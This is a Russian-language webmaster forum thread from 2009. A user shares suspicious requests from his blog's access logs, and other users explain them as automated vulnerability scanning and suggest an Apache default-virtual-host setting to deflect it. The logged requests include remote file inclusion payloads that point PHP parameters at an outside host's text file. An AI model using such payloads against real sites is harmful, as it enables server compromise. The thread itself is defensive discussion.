С нами с 15.03.07
Сообщения: 35
Рейтинг: 33
|
 Добавлено: 02/03/09 в 12:18 |
Сегодня просматривая статистику обнаружил такие записи:
хttp://блог.com/ccbill/secure/ccbill.log
хttp://блог.com/cgi-bin/whereami.cgi
хttp://блог.com/editor/assetmanager/assetmanager.asp
хttp://блог.com/index.php?act=хttp://www.некто.hostwq.net/некто.txt?
хttp://блог.com/index.php?TWC=хttp://www.некто.hostwq.net/некто.txt?
хttp://блог.com/index.php?[Home]=хttp://www.некто.hostwq.net/некто.txt?
|
|
|
|
| |
С нами с 25.01.07
Сообщения: 2669
Рейтинг: 3470
|
| Добавлено: 02/03/09 в 12:19 |
сканируют на уязвимости
|
|
|
|
| |
Криптопохуист
С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019
|
| Добавлено: 02/03/09 в 12:38 |
это когда домен виртуалхоста установлен как первый в списке конфига апача (он же дефолтный), что к нему можно обратиться по айпи http://1.1.1.1/ - опа и вот тут твой блог (1.1.1.1 - айпи блога).
Тогда на этот айпи обрушивается туева хуча автоматических сканнеров уязвимостей. Это ты еще мало там увидел.
Чтобы такого не было, я лично первый виртуалхост устанавливаю примерно следующим:
| Код: | <VirtualHost 1.1.1.1>
ServerName foobar
DocumentRoot /var/empty
<Directory /var/empty>
Order Deny,Allow
Deny from all
</Directory>
</VirtualHost> |
То есть первый виртуалхост на каждом айпишнике должен смотреть в пустую папку да еще и с запрещением просмотра.
Тогда пусть сканируют сколько им влезет.
Кстати много нового порой можно узнать, обратившись к своему серверу по http://айпи ))
|
|
|
|
| |
Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте! |
